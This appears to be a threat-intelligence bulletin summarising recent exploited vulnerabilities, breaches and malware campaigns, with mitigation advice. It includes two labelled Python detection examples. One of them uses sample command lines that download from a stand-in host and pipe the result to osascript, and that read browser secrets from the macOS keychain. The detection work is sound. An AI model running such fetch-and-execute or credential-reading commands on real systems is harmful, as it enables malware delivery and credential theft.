TIGR Threat Watch

Threat Watch Feed

🚩 – IOCs Added

The red flag indicates that Indicators of Compromise (IOCs) have been added to SRA’s Threat Feed used by CyberSOC clients. Articles may not be flagged if IOCs are not available at the time or are not applicable to the article.

CISA Orders Federal Agencies to Patch Actively Exploited SolarWinds Web Help Desk Vulnerability

CISA added CVE-2025-40551 to the Known Exploited Vulnerabilities catalog on February 3, 2026, ordering federal civilian agencies to patch by Friday. The critical vulnerability with severity score 9.8 affects SolarWinds Web Help Desk, an IT service management platform used for ticketing and asset tracking. Horizon3.ai researcher Jimi Sebree discovered and reported the vulnerability to SolarWinds on December 5, 2025. The flaw bypasses fixes implemented for CVE-2024-28986, a 2024 vulnerability that was also added to CISA’s KEV catalog. SolarWinds released patches in Web Help Desk version 2026.1 addressing CVE-2025-40551 and several other recently discovered security bugs.

Impact: The vulnerability enables unauthenticated remote code execution on systems running vulnerable Web Help Desk versions. Active exploitation allows attackers to compromise IT service management platforms handling sensitive support tickets, asset inventories, and internal helpdesk operations. Organizations using Web Help Desk for centralized IT support face risks of unauthorized access to ticketing systems containing employee information, system configurations, and corporate infrastructure details. The bypass of previous security fixes demonstrates persistent attacker interest in this platform as an entry point into enterprise networks.

Recommendation: Organizations running SolarWinds Web Help Desk should upgrade to version 2026.1 or later. Federal civilian agencies must complete patching by February 7, 2026 per the CISA directive. Audit Web Help Desk installations for signs of compromise, including unauthorized user accounts, configuration changes, or suspicious access patterns. Review Web Help Desk access logs for unauthorized authentication attempts or unusual administrative activity occurring before patch deployment.

ShinyHunters Breaches Harvard University Alumni Database Exposing 115,000 Donor Records

Hudson Rock researchers disclosed a data breach affecting Harvard University’s Alumni Affairs and Development department on February 4, 2026, attributed to the ShinyHunters cybercriminal group operating as part of the “Scattered LAPSUS$ Hunters” collective. The breach exposed approximately 115,000 sensitive records containing detailed donor information, wealth classifications, and admissions coordination data. The exposed database included comprehensive tracking of alumni, spouses, parents, and current students with entries categorized by relationship type and financial contribution levels. The leak revealed “Lifetime Recognition” donation amounts for high-profile donors including Mark Zuckerberg ($603 million), Michael Bloomberg ($421 million), and Steven Ballmer ($102 million), along with home addresses, private email addresses, and family member tracking. Documents showed coordination between fundraising and admissions departments through “Admissions Holds” that pause donor solicitation when family members apply to the university. The attack likely used voice phishing targeting administrative staff with access to the alumni database. Security analysts assess ShinyHunters employed deepfake voice technology to impersonate IT support staff, directing victims to fake Single Sign-On portals that captured credentials in real time through man-in-the-middle techniques. Attackers convinced victims to approve multi-factor authentication push notifications or provide one-time passwords, allowing session token hijacking that bypassed security controls without triggering alerts. Once inside the university’s systems, the group moved laterally across Microsoft 365, SharePoint, and Salesforce platforms, searching for files containing terms like “confidential,” “stewardship,” and “proposal.”

Impact: The breach exposes the private financial relationships and personal details of the world’s most influential academic donor base, creating a high-value target environment for extortion, social engineering, and identity theft. The consolidated database provides attackers with wealth classifications, residential addresses, private contact information, and family relationship mapping for ultra-high-net-worth individuals. The leak enables granular profiling of donor cultivation strategies and relationship management approaches, potentially compromising ongoing fundraising campaigns and donor relationships. The centralization of sensitive data in cloud platforms demonstrates a systemic vulnerability affecting higher education institutions managing major donor portfolios.

Recommendation: Higher education institutions should implement phishing-resistant multi-factor authentication for all administrative staff accessing donor databases and development systems. Deploy Zero Trust architecture requiring continuous verification for access to sensitive alumni and development data. Conduct security awareness training focused on voice phishing detection for administrative personnel. Segment alumni and development databases from general institutional systems to limit lateral movement following credential compromise. Implement data loss prevention controls monitoring for bulk exfiltration of sensitive files.

🚩 Notepad++ Supply Chain Attack Deployed Three Distinct Infection Chains Over Four Months

Kaspersky researchers disclosed a supply chain attack targeting Notepad++ text editor update infrastructure that operated from July through October 2025. On February 2, 2026, Notepad++ developers announced their update infrastructure was compromised due to a hosting provider breach from June to September 2025, with attackers maintaining access until December 2025. The campaign targeted approximately a dozen machines belonging to individuals in Vietnam, El Salvador, and Australia, along with government, financial, and IT service provider organizations. Attackers continuously changed their attack methods, server addresses, and malware throughout the operation. Three infection chains were identified: Chain 1 ran from late July through early August using fake update files that collected system information and uploaded it to temp[.]sh before deploying the Cobalt Strike backdoor through exploitation of old ProShow software vulnerabilities. Chain 2 operated from mid-September through late September with modified update files that expanded information collection and used legitimate Lua interpreter software to load and execute malicious code, also delivering Cobalt Strike. Chain 3 deployed in October using standard malware installation techniques to drop the Chrysalis backdoor, with Rapid7 observing additional Cobalt Strike deployment. Attackers rotated between different domains including cdncheck.it[.]com, self-dns.it[.]com, safe-dns.it[.]com, and api.wiresguard[.]com throughout the campaign.

Impact: The compromise of Notepad++ update infrastructure enabled targeted attacks against high-profile organizations worldwide through a trusted software distribution channel. Attackers demonstrated sophistication by drastically changing infection chains monthly to evade detection while spreading implants in a targeted manner. The deployment of multiple payloads including Cobalt Strike Beacon and Chrysalis backdoor provided persistent remote access for espionage and data theft operations. Chain 3’s execution techniques match patterns associated with Chinese-speaking threat actors. The targeted nature of infections affecting government, financial, and IT service provider organizations suggests intelligence collection objectives.

Recommendation: Organizations using Notepad++ should verify software integrity and investigate systems for compromise indicators. Review network traffic for DNS resolutions of the temp[.]sh domain and HTTP requests with temp[.]sh URLs embedded in User-Agent headers. Hunt for suspicious command sequences including whoami, tasklist, systeminfo, and netstat -ano executed in rapid succession. Block the identified malicious domains. Search for files dropped in the %appdata%\ProShow, %APPDATA%\Adobe\Scripts, and %appdata%\Bluetooth directories. Monitor for LOLC2 service connections, local reconnaissance command sequences, and persistence through Windows Registry Run keys.
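The hunting steps in this recommendation, worked as an added example that is not from the bulletin or from Kaspersky: a small Python hunt over constructed sample telemetry that flags the reconnaissance burst, temp[.]sh in HTTP User-Agent or DNS traffic, and file drops into the named %APPDATA% directories. The event format, the 60-second burst window and the sample lines are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
# Constructed event format for this example (not a real product log):
#   "<ISO timestamp> <host> <kind> <payload>", kind is process, http, dns or file.
RECON_CMDS = {"whoami", "tasklist", "systeminfo", "netstat"}   # run in rapid succession
BURST_WINDOW_SEC = 60                                           # assumed "rapid" window
# Drop directories from the bulletin; %APPDATA% expands to ...\AppData\Roaming.
DROP_DIRS = (r"\appdata\roaming\proshow", r"\appdata\roaming\adobe\scripts",
             r"\appdata\roaming\bluetooth")
TEMP_SH = re.compile(r"\btemp\.sh\b", re.IGNORECASE)   # logs hold the undefanged domain

def parse(line):
    ts, host, kind, payload = line.split(" ", 3)
    return {"ts": datetime.fromisoformat(ts), "host": host, "kind": kind, "payload": payload}

def hunt(lines):
    """Return (host, finding) tuples for every bulletin indicator that matches."""
    findings, recon = [], defaultdict(list)   # recon: host -> [(ts, command)]
    for ev in map(parse, lines):
        host, p = ev["host"], ev["payload"]
        if ev["kind"] == "process":
            exe = p.split()[0].lower().rsplit("\\", 1)[-1].removesuffix(".exe")
            if exe in RECON_CMDS:
                recon[host].append((ev["ts"], exe))
        elif ev["kind"] == "http" and TEMP_SH.search(p):
            findings.append((host, "temp.sh URL in HTTP request/User-Agent"))
        elif ev["kind"] == "dns" and TEMP_SH.search(p):
            findings.append((host, "DNS resolution of temp.sh"))
        elif ev["kind"] == "file" and any(d in p.lower() for d in DROP_DIRS):
            findings.append((host, "file dropped in " + p))
    # Sliding window: all four recon commands from one host inside BURST_WINDOW_SEC.
    for host, events in recon.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            seen = {c for t, c in events[i:] if (t - t0).total_seconds() <= BURST_WINDOW_SEC}
            if seen == RECON_CMDS:
                findings.append((host, "recon burst: " + ", ".join(sorted(seen))))
                break
    return findings

SAMPLE = [  # constructed sample telemetry, not real observations
    "2025-08-01T10:00:01 ws01 process C:\\Windows\\System32\\whoami.exe",
    "2025-08-01T10:00:03 ws01 process C:\\Windows\\System32\\tasklist.exe",
    "2025-08-01T10:00:05 ws01 process C:\\Windows\\System32\\systeminfo.exe",
    "2025-08-01T10:00:07 ws01 process C:\\Windows\\System32\\netstat.exe -ano",
    "2025-08-01T10:00:09 ws01 http POST 203.0.113.10 User-Agent: https://temp.sh/upload/abc123",
    "2025-08-01T10:01:00 ws01 file C:\\Users\\a\\AppData\\Roaming\\ProShow\\load.dll",
    "2025-08-01T11:00:00 ws02 process C:\\Windows\\System32\\whoami.exe",
    "2025-08-01T11:30:00 ws02 process C:\\Windows\\System32\\netstat.exe -ano",
]

if __name__ == "__main__":
    print(*hunt(SAMPLE), sep="\n")
```

Two isolated commands half an hour apart on ws02 produce no finding, which is the point of the window: the bulletin describes the four commands running back to back.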

CISA Warns of Actively Exploited Five-Year-Old GitLab SSRF Vulnerability

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2021-39935 to its Known Exploited Vulnerabilities Catalog on February 3, 2026, warning that threat actors are actively exploiting this server-side request forgery (SSRF) flaw in GitLab Community and Enterprise Editions. Originally patched by GitLab in December 2021, the vulnerability allows unauthenticated attackers to access the CI Lint API and force GitLab servers to make unauthorized requests to internal or external resources. Despite being addressed over three years ago, recent reports indicate renewed exploitation activity targeting unpatched GitLab instances exposed to the internet. The flaw stems from improper validation of user-supplied URLs during continuous integration configuration checks. Attackers can craft malicious API requests without authentication to conduct internal network scanning, expose sensitive metadata services in cloud environments, leak credentials, or exploit secondary vulnerabilities in connected systems. With over 49,000 GitLab instances currently exposed online (according to Shodan), and GitLab’s platform serving more than 30 million registered users including 50% of Fortune 100 organizations, the attack surface remains significant for organizations running outdated versions.

Impact: Unauthenticated SSRF exploitation in GitLab poses severe risks to development and CI/CD pipeline environments. Successful attacks can expose cloud metadata services containing authentication tokens and configuration secrets, enable lateral movement into internal networks, facilitate supply chain compromises, and serve as initial intrusion vectors for ransomware or cryptomining campaigns. The vulnerability’s exploitation in DevOps infrastructure creates downstream risks affecting source code repositories, build systems, and production deployment pipelines across affected organizations.

Recommendation: Apply GitLab’s security patches to the latest fixed versions as specified in GitLab’s official security advisory addressing CVE-2021-39935. Review and limit access to the CI Lint API, especially for GitLab instances accessible from public networks. Implement authentication requirements and IP whitelisting where possible.

🚩 Microsoft Reports Infostealer Campaigns Expanding Beyond Windows, with macOS-Targeted Stealers

Microsoft published research reporting that infostealer threats are increasingly targeting macOS environments, leveraging cross-platform languages like Python, and abusing trusted platforms and utilities to deliver credential-stealing malware. Microsoft Defender Experts observed macOS-targeted campaigns since late 2025 using social engineering, including ClickFix-style prompts and malicious DMG installers, to deploy macOS stealers such as DigitStealer, MacSync, and Atomic macOS Stealer (AMOS). Microsoft reports these campaigns commonly use fileless execution, native macOS utilities, and AppleScript automation to collect credentials, session data, and secrets from browsers, keychains, and developer environments, then exfiltrate and attempt to remove traces. In parallel, Microsoft observed Python-based stealer campaigns distributed via phishing that collect credentials, cookies, authentication tokens, payment data, and crypto wallet data, with examples including PXA Stealer activity in October and December 2025 that used persistence via registry Run keys or scheduled tasks and exfiltration via Telegram. Microsoft also describes platform abuse campaigns, including WhatsApp abuse in November 2025 to propagate malware and ultimately deliver Eternidade Stealer, and a September 2025 malvertising and SEO poisoning campaign using a fake Crystal PDF installer that establishes persistence via scheduled tasks and steals browser data.

Impact: These activity patterns increase the likelihood of credential theft and session hijacking across email, banking, social media, and corporate cloud services, and can create direct financial exposure through cryptocurrency wallet theft. Microsoft notes that compromise of developer credentials can enable access to source code, cloud infrastructure, and potentially customer data, and that broader infostealer compromise can lead to follow-on outcomes including unauthorized internal access, data breaches, business email compromise, supply chain abuse, and ransomware activity.

Recommendation: Recommendations include strengthening user awareness of malvertising redirect chains, fake installers, and ClickFix-style copy-and-paste prompts, and discouraging installation of unsigned DMGs or unofficial “terminal-fix” utilities. Teams should monitor for suspicious macOS Terminal activity and fileless execution patterns involving the utilities and flows called out by Microsoft, including curl, Base64 decoding, gunzip, osascript, and JXA, and alert on abnormal access to the Keychain, browser credential stores, and developer and cloud artifacts (for example SSH keys and cloud credentials). Where Microsoft Defender is in use, enable cloud-delivered protection, run EDR in block mode, enable network and web protection, enable tamper protection, and consider Microsoft’s recommended attack surface reduction rules such as blocking potentially obfuscated scripts and blocking downloaded JS or VBScript from launching executable content.
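To illustrate the macOS monitoring advice above, an added example that is not Microsoft's or the bulletin's own tooling: a Python classifier that splits a captured shell command line into its pipeline stages and flags the download, Base64-decode, gunzip, osascript/JXA chain as well as direct keychain reads. The stage-to-utility mapping, the verdict tiers and the sample command lines are my assumptions.

```python
import re
import shlex

# Utilities that implement each stage of the chain on macOS (assumed mapping).
STAGES = {
    "download": {"curl", "wget"},
    "decompress": {"gunzip", "gzip", "zcat"},
    "interpret": {"osascript", "sh", "bash", "zsh", "python", "python3", "perl"},
}
# `security` subcommands that read the login keychain directly.
KEYCHAIN_CMDS = {"find-generic-password", "find-internet-password", "dump-keychain"}

def stages_of(cmdline):
    """Split a command line on |, ;, && and || and name the stage each command plays.
    Nested $(...) substitutions are not unwrapped; their tokens are scanned as-is."""
    found = set()
    for segment in re.split(r"\|\||\||;|&&", cmdline):
        try:
            argv = shlex.split(segment)
        except ValueError:          # unbalanced quotes: fall back to whitespace split
            argv = segment.split()
        if not argv:
            continue
        exe = argv[0].rsplit("/", 1)[-1]
        for stage, tools in STAGES.items():
            if exe in tools:
                found.add(stage)
        # Only count Base64 *decoding*; encoding is common in benign scripts.
        if exe == "base64" and any(a in ("-d", "-D", "--decode") for a in argv[1:]):
            found.add("decode")
        elif exe == "openssl" and "base64" in argv and "-d" in argv:
            found.add("decode")
        if exe == "osascript" and "-l" in argv and "JavaScript" in argv:
            found.add("jxa")        # JavaScript for Automation, as called out by Microsoft
        if exe == "security" and any(a in KEYCHAIN_CMDS for a in argv[1:]):
            found.add("keychain")
    return found

def assess(cmdline):
    """Return (verdict, stages); the tiers below decide the verdict."""
    found = stages_of(cmdline)
    if {"download", "decode", "interpret"} <= found:
        return "fileless-chain", found       # the full chain Microsoft describes
    if {"download", "interpret"} <= found:
        return "pipe-to-interpreter", found  # curl | sh style, still worth an alert
    if "keychain" in found:
        return "keychain-access", found
    return "benign", found

if __name__ == "__main__":   # constructed sample command lines, not real captures
    for cmd in ["curl -fsSL https://example.invalid/p | base64 -D | gunzip | osascript -l JavaScript",
                "echo hello | base64",
                "security find-generic-password -ga 'Chrome Safe Storage'"]:
        print(assess(cmd)[0], "<-", cmd)
```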

🚩 Check Point Research Reports Amaranth-Dragon Rapidly Weaponized a WinRAR Path Traversal Flaw (CVE-2025-8088) in Targeted Southeast Asia Espionage Campaigns

Check Point Research reported activity it tracks as “Amaranth-Dragon,” describing highly targeted cyber-espionage campaigns during 2025 against government and law enforcement agencies in Southeast Asia. The report describes targeting across multiple countries in the region, including Cambodia, Thailand, Laos, Indonesia, Singapore, and the Philippines, with lure themes aligned to local geopolitical events. Less than ten days after CVE-2025-8088 was disclosed (August 8, 2025), Check Point Research observed Amaranth-Dragon introduce malicious RAR archives into its campaigns to exploit the WinRAR vulnerability, described as a Windows WinRAR path traversal issue that can enable arbitrary code execution via crafted archive files. Check Point Research describes the technique as allowing attackers to drop files into the Startup folder for persistence and indirect execution on reboot, and also reports use of legitimate hosting services such as Dropbox, DLL sideloading, and a custom “Amaranth Loader” that retrieves an AES key (from Pastebin or actor-controlled servers in some cases), decrypts an encrypted payload, and executes it in memory, most commonly deploying the Havoc C2 framework. The report also describes “TGAmaranth RAT,” a Telegram-based remote access trojan using a Telegram bot as command and control and featuring anti-EDR and anti-AV capabilities. The initial delivery method is described as uncertain, though the targeted nature suggests malicious emails with weaponized attachments.

Impact: Organizations with Windows endpoints where WinRAR is installed face increased risk if targeted users open weaponized RAR archives themed around relevant local or organizational events. The activity described can enable persistent footholds and follow-on remote access through custom loaders and tooling, while leveraging legitimate cloud services and geo-restricted infrastructure to limit broader exposure and reduce visibility, which can hinder detection and incident scoping.

Recommendation: Recommendations include prioritizing remediation of CVE-2025-8088 by ensuring Windows WinRAR is updated to a fixed release per vendor guidance, and reducing organizational dependence on WinRAR where feasible through managed archive handling and attachment controls.


About TIGR Threat Watch

Our Threat Intelligence Gathering & Research (TIGR) team is focused on threat intelligence and curates a daily intelligence report, TIGR Threat Watch, with information collected from several industry intel sources. We also create and publish ad-hoc critical vulnerability notifications in case of critical and time-sensitive vulnerabilities or threats. These notifications include details and recommendations for mitigation/remediation.